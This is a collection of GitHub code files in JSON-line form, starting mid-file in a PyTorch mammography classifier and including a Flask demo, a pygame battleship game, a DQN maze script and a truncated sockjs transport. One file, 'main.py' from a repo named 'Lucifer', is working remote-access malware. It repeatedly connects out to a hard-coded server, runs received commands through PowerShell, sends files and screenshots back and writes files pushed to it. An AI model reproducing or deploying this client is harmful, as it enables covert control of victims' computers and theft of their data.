torch.nn.init.xavier_uniform_(self.token_wV) \n \n \n self.pos_embedding = nn.Parameter(torch.empty(1, (num_tokens + 1), dim))\n torch.nn.init.normal_(self.pos_embedding, std = .02) # initialized based on the paper\n\n #self.patch_conv= nn.Conv2d(64,dim, self.patch_size, stride = self.patch_size) \n\n self.cls_token = nn.Parameter(torch.zeros(1, 1, dim)) #initialized based on the paper\n self.dropout = nn.Dropout(emb_dropout)\n\n self.transformer = Transformer(dim, depth, heads, mlp_dim, dropout)\n\n self.to_cls_token = nn.Identity()\n\n self.nn1 = nn.Linear(dim, num_classes) # if finetuning, just use a linear layer without further hidden layers (paper)\n torch.nn.init.xavier_uniform_(self.nn1.weight)\n torch.nn.init.normal_(self.nn1.bias, std = 1e-6)\n \n def forward(self, img, mask = None):\n \n x = self.resnet(img)\n \n x = rearrange(x, 'b c h w -> b (h w) c') # 64 vectors each with 64 points. These are the sequences or word vecotrs like in NLP\n\n #Tokenization \n wa = rearrange(self.token_wA, 'b h w -> b w h') #Transpose\n A= torch.einsum('bij,bjk->bik', x, wa) \n A = rearrange(A, 'b h w -> b w h') #Transpose\n A = A.softmax(dim=-1)\n\n VV= torch.einsum('bij,bjk->bik', x, self.token_wV) \n T = torch.einsum('bij,bjk->bik', A, VV) \n #print(T.size())\n\n cls_tokens = self.cls_token.expand(img.shape[0], -1, -1)\n x = torch.cat((cls_tokens, T), dim=1)\n x += self.pos_embedding\n x = self.dropout(x)\n x = self.transformer(x, mask) #main game\n x = self.to_cls_token(x[:, 0]) \n x = self.nn1(x)\n \n return x\n\n#%% Custom dataset (CBIS-DDSM)\n\nfrom torch.utils.data import DataLoader\nfrom cbis_ddsm_train import CBISDataset\n\n#%% Transform\n\ntransform = {\n 'train': torchvision.transforms.Compose([\n torchvision.transforms.ToPILImage(),\n torchvision.transforms.RandomHorizontalFlip(),\n torchvision.transforms.RandomRotation(10, resample=PIL.Image.BILINEAR),\n #torchvision.transforms.RandomAffine(8, translate=(.15,.15)),\n torchvision.transforms.ToTensor(),\n #torchvision.transforms.Normalize((12513.3505859375), (16529.138671875)), # not necessary with pre-normalized dataset\n torchvision.transforms.Lambda(lambda x: x.expand(3, -1, -1)), # go from BW images to color images\n ]),\n 'val': torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n #torchvision.transforms.Normalize((12513.3505859375), (16529.138671875)),\n torchvision.transforms.Lambda(lambda x: x.expand(3, -1, -1)),\n ])\n}\n\n#%% Training and evaluation\n\nfrom args import parser\nfrom cbis_ddsm_train import run, cross_validate, plot\n\nif __name__ == \"__main__\":\n\n parser.add_argument('--no-pretrain', action='store_true',\n help='do not use pretraining (pretrained ResNet is used by default)')\n parser.add_argument('--remove-last-block', action='store_true',\n help='If set to true, the two Basic Blocks of ResNet-18 are removed')\n \n args = parser.parse_args()\n vargs = vars(args)\n print(vargs)\n print()\n\n train_dataset = CBISDataset(args.train_data, args.batch_size_train, transform['train'], binary=args.binary_classification, oversample=args.oversample, bp_filter=args.filter)\n test_dataset = CBISDataset(args.val_data, args.batch_size_val, transform['val'], binary=args.binary_classification, oversample=False, bp_filter=args.filter)\n \n train_loader = DataLoader(train_dataset, batch_size=args.batch_size_train, shuffle=True, num_workers=args.num_workers)\n test_loader = DataLoader(test_dataset, batch_size=args.batch_size_val, shuffle=False)\n \n #%%\n \n categories = 2 if args.binary_classification else 
3\n pretrained = not args.no_pretrain\n batch_size = (args.batch_size_train, args.batch_size_val)\n \n # List of arguments\n num_tokens = args.num_tokens # number of visual tokens\n depth = args.transform_depth # number of transformer modules\n \n model = PretrainedViTResNet(pretrained=pretrained, num_classes=categories, dim=args.dim, mlp_dim=args.mlp_dim, num_tokens=num_tokens, depth=depth, remove_last_block=args.remove_last_block, batch_size=batch_size).to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n \n #optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate,momentum=.9,weight_decay=1e-4)\n #lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer=optimizer, milestones=[35,48],gamma = 0.1)\n\n if args.tensorboard_dir:\n tensorboard_writer = torch.utils.tensorboard.SummaryWriter(args.tensorboard_dir)\n tensorboard_writer.add_text('args', json.dumps(vars(args)))\n tensorboard_writer.add_text('transform', str(transform))\n else:\n tensorboard_writer = None\n \n init_time = time.time()\n if args.cross_val < 1:\n run(model, optimizer, train_loader, test_loader, args.epochs, args.binary_classification, tensorboard_writer)\n else:\n cross_validate(model, optimizer, train_dataset, test_loader, args.cross_val, args.epochs, transform, args.binary_classification, tensorboard_writer)\n \n minutes, seconds = divmod(time.time() - init_time, 60)\n print('Total execution time:', '{:.0f}m {:.1f}s'.format(minutes, seconds))\n \n#%% Save model\n\n if type(args.model) is str:\n \n if not os.path.exists(args.model):\n os.makedirs(args.model)\n \n torch.save(model.state_dict(), f\"{args.model}/model.pt\")\n","repo_name":"thijswerrij/Transformers-CBIS-DDSM","sub_path":"pretrained_ResViT.py","file_name":"pretrained_ResViT.py","file_ext":"py","file_size_in_byte":12692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"10554063890","text":"from flask import Flask, render_template\nfrom random import randint\nfrom datetime import datetime\nimport requests\n\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n random_number = randint(1, 10)\n copyright_year = datetime.now().year\n return render_template(\n \"index.html\",\n random_number=random_number,\n copyright_year=copyright_year)\n\n\n@app.route(\"/guess/\")\ndef guess_name(name):\n more_note = None\n if name == \"pt\" or name.lower() == \"phuongthao\":\n age = int(datetime.now().year) - 2003\n gender = \"female\"\n more_note = \"And I think you are very cute\"\n else:\n age_response = requests.get(f\"https://api.agify.io?name={name}\")\n age = age_response.json()[\"age\"]\n gender_response = requests.get(f\"https://api.genderize.io?name={name}\")\n gender = gender_response.json()[\"gender\"]\n return render_template(\n \"guess_by_name.html\",\n name=name,\n gender=gender,\n age=age,\n more_note=more_note\n )\n\n\n@app.route(\"/blog\")\ndef blog():\n requests_url = \"https://api.npoint.io/c790b4d5cab58020d391\"\n response = requests.get(requests_url)\n posts = response.json()\n return render_template(\n \"blog.html\",\n posts=posts,\n )\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n","repo_name":"rememberyourwhy/100daysofCode","sub_path":"Day 57/Instructions/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"4419045443","text":"#! 
/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport torch.optim.lr_scheduler as lr_scheduler\n\nfrom . import BaseLRScheduler, register_lr_scheduler\n\n__author__ = 'fyabc'\n\n\n@register_lr_scheduler('fixed')\nclass FixedSchedule(BaseLRScheduler):\n \"\"\"Decay the LR on a fixed schedule.\"\"\"\n\n def __init__(self, hparams, optimizer):\n super().__init__(hparams, optimizer)\n self.lr_scheduler = lr_scheduler.LambdaLR(\n self.optimizer.optimizer, self.anneal)\n\n @staticmethod\n def add_args(parser):\n \"\"\"Add arguments to the parser for this LR scheduler.\"\"\"\n parser.add_argument('--force-anneal', '--fa', type=int, metavar='N',\n help='force annealing at specified epoch')\n\n def anneal(self, epoch):\n lrs = self.hparams.lr\n if self.hparams.force_anneal is None or epoch < self.hparams.force_anneal:\n # use fixed LR schedule\n next_lr = lrs[min(epoch, len(lrs) - 1)]\n else:\n # anneal based on lr_shrink\n next_lr = lrs[-1] * self.hparams.lr_shrink ** (epoch + 1 - self.hparams.force_anneal)\n return next_lr / lrs[0] # correct for scaling from LambdaLR\n\n def step(self, epoch, val_loss=None):\n \"\"\"Update the learning rate at the end of the given epoch.\"\"\"\n super().step(epoch, val_loss)\n self.lr_scheduler.step(epoch)\n return self.optimizer.get_lr()\n","repo_name":"renqianluo/NAS4Text","sub_path":"libs/optimizers/lr_schedulers/fixed_schedule.py","file_name":"fixed_schedule.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71878999639","text":"import pygame\nimport sys\nimport os\nfrom time import sleep\nfrom pygame.sprite import Group\n\nfrom field import Field\nfrom button import Button\n\nimport pygame.font\n\ndef check_events(bs_settings, screen, fields, ai_fields, buttons):\n \"\"\"Respond to keypresses and mouse ivents\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n check_mousedown_events(bs_settings, screen, fields, ai_fields, buttons, mouse_x, mouse_y)\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, bs_settings)\n # elif event.type == pygame.MOUSEMOTION:\n # check_mousemotion_events(event, bs_settings, screen, fields, buttons)\n \n\ndef check_mousemotion_events(event, bs_settings, screen, fields, buttons):\n x, y = event.pos\n for i in range(10):\n for j in range(10):\n for k in range(4):\n if (( x in range(fields[i][j].rect.x, fields[i][j].rect.x+48)) and (y in range(fields[i][j].rect.y, fields[i][j].rect.y+48))\n and buttons[k].activated_flag == 1 and buttons[k].amount_of_ships > 0 and fields[i][j].status == 0):\n fields[i][j].field_color = (128, 100, 71)\n fields[i][j].border_thickness = 0 \n # if fields[i][j].status == 0:\n # fields[i][j].field_color = (0, 0, 0)\n # fields[i][j].border_thickness = 1\n \n\n\n\ndef check_keydown_events(event, bs_settings):\n \"\"\"Change direction_of_ship_drawing if 'Q' has been pressed\"\"\"\n if event.key == pygame.K_q:\n bs_settings.direction_of_ship_drawing *= -1\n\n\ndef check_mousedown_events(bs_settings, screen, fields, ai_fields, buttons, mouse_x, mouse_y):\n \"\"\"Check collide of point and one of the buttons. 
Work only if player's ships can be placed\"\"\"\n if buttons[0].amount_of_ships+buttons[1].amount_of_ships+buttons[2].amount_of_ships+buttons[3].amount_of_ships > 0:\n point_and_button_collision(bs_settings, screen, fields, buttons, mouse_x, mouse_y)\n #Make shoot action if all player's ans ai's ships are on the field\n elif buttons[0].amount_of_ships+buttons[1].amount_of_ships+buttons[2].amount_of_ships+buttons[3].amount_of_ships == 0:\n shoot_action(bs_settings, screen, ai_fields, bs_settings.ships[0], mouse_x, mouse_y)\n bs_settings.phase = 1\n\n\n \n \n \n\n\ndef shoot_action(bs_settings, screen, ai_fields, ships, mouse_x, mouse_y):\n\n for m in range(10):\n for j in range(10):\n for one_ship in ships:\n \"\"\"Delete empty lists from ships' list \"\"\"\n if not one_ship:\n ships.remove(one_ship)\n \"\"\"Check if point collide with field and the field is in ships list\"\"\"\n if ai_fields[m][j].rect.collidepoint(mouse_x, mouse_y) and ai_fields[m][j] in one_ship and ai_fields[m][j].status == 2: \n #Play hit sound\n bs_settings.sound_of_hit.play()\n ai_fields[m][j].status = 3\n ai_fields[m][j].field_color = (0, 0, 0)\n ai_fields[m][j].border_thickness = 0\n\n #Remove filed from ship\n one_ship.remove(ai_fields[m][j])\n #If ship has no fileds execute surround_ship function\n if len(one_ship) <= 4:\n surround_ship(bs_settings, screen, ai_fields, one_ship[0], one_ship[1], one_ship[3], one_ship[2], 2, 5, (252,0,13))\n #Delete killed lists from ships' list\n ships.remove(one_ship)\n \n\n #If field is not in ships list activate 'miss' actions\n elif ai_fields[m][j].rect.collidepoint(mouse_x, mouse_y) and (ai_fields[m][j].status == 0 or ai_fields[m][j].status == 1 ):\n #Play miss sound\n bs_settings.sound_of_miss.play()\n\n ai_fields[m][j].status = 3\n ai_fields[m][j].field_color = (252, 0, 13)\n ai_fields[m][j].border_thickness = 5\n #Order changes\n bs_settings.order *= -1\n\ndef point_and_button_collision(bs_settings, screen, fields, buttons, mouse_x, mouse_y):\n for i in range(4):\n if buttons[i].rect.collidepoint(mouse_x, mouse_y) and buttons[i].activated_flag == -1:\n #Change flag to track it's condition\n buttons[i].activated_flag *= -1\n buttons[i].scale_button(2)\n buttons[i].blitme()\n #Set other buttons flags to -1, cause only one button per time can be active\n for j in range(1, 4):\n buttons[i-j].activated_flag = -1\n buttons[i-j].button_color = (0, 255, 0)\n \n #Check and call function to draw ship \n if buttons[i].activated_flag == 1 and buttons[i].amount_of_ships > 0:\n border_thickness = 0\n color = (255, 239, 0)\n draw_ship(bs_settings, screen, fields, buttons, bs_settings.ships[1], i, mouse_x, mouse_y, color, border_thickness)\n\n\n\ndef draw_ship(bs_settings, screen, fields, buttons, ships, i, mouse_x, mouse_y, color=(0,0,0), border_thickness=1):\n #The list store fields of one ship and list itself store in ships from settings.py\n new_ship = []\n\n for m in range(10):\n for j in range(10): \n \"\"\"Check collide of point and one cage of the field and check if cage is already used\"\"\"\n if fields[m][j].rect.collidepoint(mouse_x, mouse_y) and fields[m][j].status == 0:\n fields[m][j].field_color = color #(154, 152, 152)\n fields[m][j].border_thickness = border_thickness \n # Status = 2 means the field is drawn by ship\n fields[m][j].status = 2\n \n\n check_of_the_free_space(bs_settings, screen, fields, buttons, i, j, m)\n\n \"\"\"Add necessary cages for the first cliccked cage to complete ship\"\"\"\n if bs_settings.permission == 1 and bs_settings.direction_of_ship_drawing == 
1:\n #Append to the list ship's size\n new_ship.append(buttons[i].ship_size)\n #Append to the list direction of the drawling of the ship\n new_ship.append(bs_settings.direction_of_ship_drawing)\n #Append to the list coordinates of the firs ship's field\n new_ship.append(m)\n new_ship.append(j)\n #Append to the list field of the ship\n new_ship.append(fields[m][j])\n\n for k in range(1, buttons[i].ship_size):\n fields[m][j+k].field_color = color \n fields[m][j+k].border_thickness = border_thickness \n fields[m][j+k].status = 2\n #Append to the list field of the ship\n new_ship.append(fields[m][j+k])\n\n \n elif bs_settings.permission == 1 and bs_settings.direction_of_ship_drawing == -1:\n #Append to the list ship's size\n new_ship.append(buttons[i].ship_size)\n #Append to the list direction of the drawling of the ship\n new_ship.append(bs_settings.direction_of_ship_drawing)\n #Append to the ships list coordinates of the firs ship's field\n new_ship.append(m)\n new_ship.append(j)\n #Append to the list field of the ship\n new_ship.append(fields[m][j])\n \n for k in range(1, buttons[i].ship_size):\n fields[m+k][j].field_color = color \n fields[m+k][j].border_thickness = border_thickness\n fields[m+k][j].status = 2\n #Append to the list field of the ship\n new_ship.append(fields[m+k][j])\n\n \n \n\n \"\"\"Surround ship for escaping collisions\"\"\"\n if bs_settings.permission == 1:\n surround_ship(bs_settings, screen, fields, buttons[i].ship_size, bs_settings.direction_of_ship_drawing, j, m, 1)\n\n \n buttons[i].amount_of_ships -= 1\n bs_settings.permission = 0\n #Append to the ships list size and fields of new ship \n ships.append(new_ship)\n\ndef surround_ship(bs_settings, screen, fields, ship_size, direction_of_ship_drawing, j, m, status, border_thickness = 1, field_color = (0,0,0)):\n \"\"\"Surround ship by non-active fileds for ships cant be placed close to each other.\n Function get postion of the first field of the ship, size and direction and surround ship according to them \n \"\"\"\n if direction_of_ship_drawing == 1:\n #Surround by x coordinate\n for jteration in range(-1, 2, 2):\n for iteration in range(-1, ship_size+1):\n #try if ship's surronding out of game field\n try:\n if j+iteration>= 0 and m+jteration >= 0:\n fields[m+jteration][j+iteration].border_thickness = border_thickness\n fields[m+jteration][j+iteration].field_color = field_color\n fields[m+jteration][j+iteration].status = status\n except IndexError:\n break\n #Surround by y coordinate\n for iteration in range(-1, ship_size+1, ship_size+1):\n #try if ship's surronding out of game field\n try: \n if j+iteration>= 0:\n fields[m][j+iteration].border_thickness = border_thickness\n fields[m][j+iteration].field_color = field_color\n fields[m][j+iteration].status = status\n except IndexError:\n break\n\n elif direction_of_ship_drawing == -1:\n #Surround by y coordinate\n for jteration in range(-1, 2, 2):\n for iteration in range(-1, ship_size+1):\n #try if ship's surronding out of game field\n try:\n if m+iteration >= 0 and j+jteration >= 0:\n fields[m+iteration][j+jteration].border_thickness = border_thickness\n fields[m+iteration][j+jteration].field_color = field_color\n fields[m+iteration][j+jteration].status = status\n except IndexError:\n break\n #Surround by x coordinate\n for iteration in range(-1, ship_size+1, ship_size+1):\n #try if ship's surronding out of game field\n try:\n if m+iteration >= 0:\n fields[m+iteration][j].border_thickness = border_thickness\n fields[m+iteration][j].field_color = field_color\n 
fields[m+iteration][j].status = status\n except IndexError:\n break\n\n\n\n \n \ndef check_of_the_free_space(bs_settings, screen, fields, buttons, i, j, m):\n \"\"\"Check if cages have alredy occupied. If it so cancel previous 'If' action\"\"\"\n if buttons[i].ship_size == 1:\n bs_settings.permission = 1\n #try if ship out of game field\n try:\n if bs_settings.direction_of_ship_drawing == 1: \n for k in range(1, buttons[i].ship_size):\n if fields[m][j+k].status != 0:\n fields[m][j].field_color = (0, 0, 0)\n fields[m][j].border_thickness = 1\n fields[m][j].status = 0\n buttons[i].amount_of_ships += 1\n bs_settings.permission = 0\n break \n else:\n bs_settings.permission = 1\n\n\n elif bs_settings.direction_of_ship_drawing == -1:\n for k in range(1, buttons[i].ship_size):\n if fields[m+k][j].status != 0:\n fields[m][j].field_color = (0, 0, 0)\n fields[m][j].border_thickness = 1\n fields[m][j].status = 0\n buttons[i].amount_of_ships += 1\n bs_settings.permission = 0\n break \n else:\n bs_settings.permission = 1\n except IndexError:\n bs_settings.permission = 0\n fields[m][j].field_color = (0, 0, 0)\n fields[m][j].border_thickness = 1\n fields[m][j].status = 0\n buttons[i].amount_of_ships += 1\n bs_settings.permission = 0\n\n\n\n\n\ndef update_screen(bs_settings, screen, fields, ai_fields, buttons, layout):\n #Redraw the screen during each pass thruogh the loop\n screen.fill(bs_settings.bg_color)\n\n if bs_settings.end_game == 1:\n layout.draw_layout()\n\n \n #Draw player's field\n for i in fields:\n for one_field in i:\n one_field.draw_field()\n #Draw ai's field\n for j in ai_fields:\n for one_ai_field in j:\n one_ai_field.draw_field()\n #Draw buttons\n for one_button in buttons:\n one_button.blitme()\n prep_text(bs_settings, screen, 'Game rules:', 380)\n prep_text(bs_settings, screen, '1. Place your ships on the right field.', 400)\n prep_text(bs_settings, screen, ' Use the Q key to cahange their position', 420)\n prep_text(bs_settings, screen, \"2. 
Destroy all of your opponent's ships\", 440)\n prep_text(bs_settings, screen, \" by shooting at the left field\", 460)\n\n\n\n #Make the most recently drawn visible\n pygame.display.flip()\n\n\n#Make an list of player's field\ndef create_game_field_1(bs_settings, screen, fields):\n for i in range(10):\n fields.append([])\n for j in range(10):\n new_field = Field(bs_settings, screen)\n new_field.rect.y += 48 * i\n new_field.rect.x += 48 * j\n fields[i].append(new_field)\n\n\n#Make an array of ai's field\ndef create_game_field_2(bs_settings, screen, ai_fields):\n for i in range(10):\n ai_fields.append([])\n for j in range(10):\n #Define new coordinates for ai's field\n new_field = Field(bs_settings, screen)\n new_field.rect.y = 0\n new_field.rect.x = 0\n new_field.rect.y += 48 * i\n new_field.rect.x += 48 * j\n ai_fields[i].append(new_field)\n\n\ndef create_buttons(bs_settings, screen):\n #Initialize buttons\n buttons = []\n\n for button in bs_settings.buttons_settings.keys():\n value = bs_settings.buttons_settings.get(button)\n #Initialize new Button object\n new_button = Button(bs_settings, screen)#, value[5], 18)\n \"\"\"Define unique values of the new button\"\"\"\n #Give image to the ship\n new_button.get_image(value[2]) \n new_button.rect.x = value[0]\n new_button.rect.y = value[1] \n new_button.ship_size = value[3]\n new_button.amount_of_ships = value[4]\n new_button.prep_text(button)\n #Add the new button to buttons list\n buttons.append(new_button)\n\n return buttons\n \n\ndef end_game_check(bs_settings, screen, buttons, layout):\n \"\"\"Check if all ships of one side are destoyed and ending game\"\"\"\n #Check if all ships are placed\n if buttons[0].amount_of_ships == 0 and buttons[1].amount_of_ships == 0 and buttons[2].amount_of_ships == 0 and buttons[3].amount_of_ships == 0:\n for i in range(2):\n if not bs_settings.ships[i]:\n bs_settings.end_game = 1\n layout.prep_msg(bs_settings.end_msg[i])\n\n\n\n\n \n\n\n\ndef prep_text(bs_settings, screen, msg, centry):\n screen = screen\n screen_rect = screen.get_rect()\n\n font = pygame.font.Font(os.path.join('images', 'freesansbold.ttf'), 13)\n textimage = font.render(str(msg), True,\n (30, 30, 30))\n\n text_rect = textimage.get_rect()\n text_rect.centery = centry\n text_rect.left = 485\n screen.blit(textimage, text_rect)\n \n\n\n\n\n\n\n\n\n \n \n ","repo_name":"KurtVobain/battleship","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":16226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6761403300","text":"\"\"\"\nFaça um programa que gere um número aleátorio entre 0 e 50 e o usuário deve acertá-lo\n\"\"\"\n\nfrom random import randint\nfrom time import sleep\n\nmaquina = randint(0 , 50)\ncont = 0\nprint (\"GERANDO UM NÚMERO ENTRE 0 E 50...\")\nprint (\"-\"*40)\nsleep (2.5)\nprint (\"TENTE ADVINHAR NO NUMERO QUE PENSEI\")\n\nwhile True:\n numero = int(input(\"Digite o número que você deseja: \"))\n if numero < 0 or numero > 50:\n print (\"Numéro inválido. Tente novamente!\")\n else:\n if numero == maquina:\n print (\"Você acertou o número!\")\n print (\"Número de tentativas: {}\".format(cont))\n break\n else:\n if numero < maquina:\n print (\"Quasee! Tente um número um pouco mais pra cima\")\n cont = cont + 1\n else:\n print (\"Quasee! 
Tente um número um pouco mais pra baixo\")\n cont = cont + 1\n","repo_name":"igornunes7/Python","sub_path":"basico09.py","file_name":"basico09.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"22643330077","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom torch.optim import Adam\nimport gym\nimport gym_maze\nimport sys\nimport time\n\nclass ReplayMemory:\n # capacity is approximately 100MB\n # def __init__(self, size=27000, shape=(10, 10, 9)):\n def __init__(self, size=5000, shape=(5, 5, 8)):\n self.size = size\n self.reward = np.zeros(size)\n self.first_state = np.zeros((size,) + shape)\n self.second_state = np.zeros((size,) + shape)\n self.action = np.zeros(size)\n self.position = 0\n self.full = False\n\n def push(self, first_state, action, reward, second_state):\n self.first_state[self.position, :,:,:] = first_state\n self.second_state[self.position, :,:,:] = second_state\n # self.first_state[self.position, :,:] = first_state\n # self.second_state[self.position, :,:] = second_state\n self.action[self.position] = action\n self.reward[self.position] = reward\n self.position = (self.position + 1) % self.size\n if self.position == self.size - 1:\n self.full = True\n\n def sample(self, batch_size):\n ind = np.random.randint(0, len(self), batch_size)\n return self.first_state[ind], self.action[ind], \\\n self.reward[ind], self.second_state[ind]\n\n def last(self):\n return self.first_state[self.position-1], self.action[self.position-1], \\\n self.reward[self.position-1], self.second_state[self.position-1]\n\n def __len__(self):\n if self.full:\n return self.size\n return self.position\n\n\nclass DQN(nn.Module):\n def __init__(self):\n super(DQN, self).__init__()\n self.conv1 = nn.Conv2d(8, 8, kernel_size=3, stride=1, padding=1)\n self.lin = nn.Linear(200, 4)\n\n def forward(self, x):\n # x = self.lin(x.view(x.size(0), -1))\n # return x.view(x.size(0), 4)\n x = x.permute(0, 3, 1, 2)\n x = self.conv1(x)\n x = self.lin(x.view(x.size(0), 200))\n # x = F.relu(self.bn1(self.conv1(x)))\n # x = F.relu(self.bn2(self.conv2(x)))\n # x = F.relu(self.bn3(self.conv3(x)))\n # x = self.conv4(x)\n return x.view(x.size(0), -1)\n\ndef select_action(model, state):\n # start with e-greedy\n epsilon = 0.1\n if np.random.uniform() > epsilon:\n return model(state).data.max(1)[1].numpy()[0]\n else:\n return np.random.randint(4)\n\nnp.random.seed(10)\nenvs = [gym.make('small-maze-{}-v0'.format(i)) for i in range(10)]\nmems = [ReplayMemory() for i in range(10)]\n\ndqn = DQN().train()\noptimizer = Adam(dqn.parameters())\nbatch_size = 10\ngamma = 0.99\n\nepisode_steps = []\n\nnum_episodes = 100\nfor i_episode in range(num_episodes):\n state = env.reset()\n t = 0\n done = False\n total_reward = 0\n\n while not done and t < 2000:\n # acting\n # state_variable = Variable(torch.from_numpy(state[np.newaxis,:,:].astype('float32')))\n\n state_variable = Variable(torch.from_numpy(state[np.newaxis,:,:,:].astype('float32')))\n action = select_action(dqn, state_variable)\n next_state, reward, done, _ = env.step(action)\n\n\n total_reward += reward * gamma ** t\n memory.push(state, action, reward, next_state)\n state = np.copy(next_state)\n\n if i_episode > 50:\n env.render()\n # training\n state_batch, action_batch, reward_batch, next_state_batch = memory.sample(batch_size)\n\n action_batch = action_batch.reshape(batch_size,1)\n state_batch 
= Variable(torch.from_numpy(state_batch.astype('float32')))\n action_batch = Variable(torch.from_numpy(action_batch.astype('int64')))\n reward_batch = Variable(torch.from_numpy(reward_batch.astype('float32')))\n next_state_batch = Variable(torch.from_numpy(next_state_batch.astype('float32')))\n next_state_values = dqn(next_state_batch).max(1)[0]\n state_action_values = dqn(state_batch).gather(1, action_batch)\n\n expected_state_action_values = (next_state_values * gamma) + reward_batch\n\n loss = F.smooth_l1_loss(state_action_values, expected_state_action_values.detach())\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n t += 1\n\n print('done', t, 'steps', total_reward, 'reward')\n\n# import matplotlib.pyplot as plt\n\n# plt.plot(episode_steps)\n# plt.savefig('/Users/user/Desktop/foo.png')\n# dqn = DQN()\n# dqn(Variable(torch.from_numpy(np.zeros((1,10,10,9), dtype='float32'))))\n","repo_name":"dcbyrnes/Exploration","sub_path":"dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"4738332233","text":"import socket\nimport subprocess\nimport time\nimport os\nimport pyautogui\nfrom datetime import datetime\n\n\ndef main():\n # initial config\n eof = \"\"\n end_result = \"\"\n chunk_size = 2048\n server_address = (\"192.168.8.102\", 8091)\n\n while True:\n try:\n # create a client\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"connecting to server...\", server_address)\n\n # trying to connect with the server\n client_socket.connect(server_address)\n\n while True:\n # receive a command from server\n command = client_socket.recv(1024).decode()\n\n # change path\n if command.startswith(\"cd\") or len(command) == 2 and command[0].isalpha() and command[1] == \":\":\n change_path(command)\n continue\n\n elif command.startswith(\"download \"):\n file_name = command.split(' ', 1)[1]\n\n # check if file is exist to send it to server\n if os.path.exists(file_name):\n exists = \"yes\"\n client_socket.send(exists.encode())\n send_file(file_name, client_socket, eof, chunk_size)\n continue\n\n elif command.startswith(\"upload\"):\n exists = client_socket.recv(1024)\n\n if exists.decode() == \"yes\":\n answer = \"yes\"\n client_socket.send(answer.encode())\n file_name = command.split(' ', 1)[1]\n\n save_file(file_name, client_socket, eof, chunk_size)\n\n continue\n\n elif command == \"screenshot\":\n\n screenshot = take_screenshot()\n\n client_socket.send(screenshot.encode())\n\n if os.path.exists(screenshot):\n exists = \"yes\"\n client_socket.send(exists.encode())\n answer = client_socket.recv(1024)\n if answer.decode() == \"yes\":\n send_file(screenshot, client_socket, eof, chunk_size)\n\n print(\"File sent successfully\")\n os.remove(screenshot)\n continue\n\n elif command == \"\":\n continue\n\n else:\n execute_command(client_socket, command, end_result)\n\n\n except Exception:\n print(\"can't connect to server\")\n time.sleep(3)\n\n\ndef change_path(command):\n path = command.split(' ', 1)[1] if command.startswith(\"cd\") else command\n if os.path.exists(path):\n os.chdir(path)\n\n\ndef send_file(file_name, client_socket, eof, chunk_size):\n with open(file_name, \"rb\") as file:\n chunk = file.read(chunk_size)\n while len(chunk) > 0:\n client_socket.send(chunk)\n chunk = file.read(2048)\n client_socket.send(eof.encode())\n print(\"File sent successfully\")\n\n\ndef save_file(file_name, client_socket, eof, chunk_size):\n with 
open(file_name, \"wb\") as download_file:\n print(\"Downloading file\")\n while True:\n chunk = client_socket.recv(chunk_size)\n if chunk.endswith(eof.encode()):\n chunk = chunk[:-len(eof)]\n download_file.write(chunk)\n break\n download_file.write(chunk)\n print(\"File Downloaded successfully\")\n\n\ndef take_screenshot():\n now = datetime.now()\n # unique name\n now = now.strftime(\"%m-%d-%Y-%H.%M.%S\")\n print(\"Take Screenshot\")\n screen = pyautogui.screenshot()\n screen.save(\"\" + now + '.png')\n print(\"Screenshot Saved\")\n screenshot = now + '.png'\n return screenshot\n\n\ndef execute_command(client_socket, command, end_result):\n output = subprocess.run([\"powershell.exe\", command], shell=True, capture_output=True,\n stdin=subprocess.DEVNULL)\n if output.stderr.decode(\"utf-8\") == \"\":\n result = output.stdout\n result = result.decode(\"utf-8\") + end_result\n result = result.encode(\"utf-8\")\n elif output.stderr.decode(\"utf-8\") != \"\":\n result = output.stderr\n result = result.decode(\"utf-8\") + end_result\n result = result.encode(\"utf-8\")\n client_socket.sendall(result)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"LoaiAlqatanani/Lucifer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"15698180573","text":"\"\"\" iframe-eventsource transport \"\"\"\nfrom aiohttp import web, hdrs\nfrom sockjs.protocol import ENCODING\n\nfrom .base import StreamingTransport\nfrom .utils import CACHE_CONTROL, session_cookie\n\n\nclass EventsourceTransport(StreamingTransport):\n async def send(self, text):\n blob = \"\".join((\"data: \", text, \"\\r\\n\\r\\n\")).encode(ENCODING)\n await self.response.write(blob)\n\n self.size += len(blob)\n if self.size > self.maxsize:\n return True\n else:\n return False\n\n async def process(self):\n headers = (\n (hdrs.CONTENT_TYPE, \"text/event-stream\"),\n (hdrs.CACHE_CONTROL, CACHE_CONTROL),\n )\n headers += session_cookie(self.request)\n\n # open sequence (sockjs protocol)\n resp = self.response = web.StreamResponse(headers=headers)\n await resp.prepare(self.request)\n await resp.write(b\"\\r\\n\")\n\n # handle 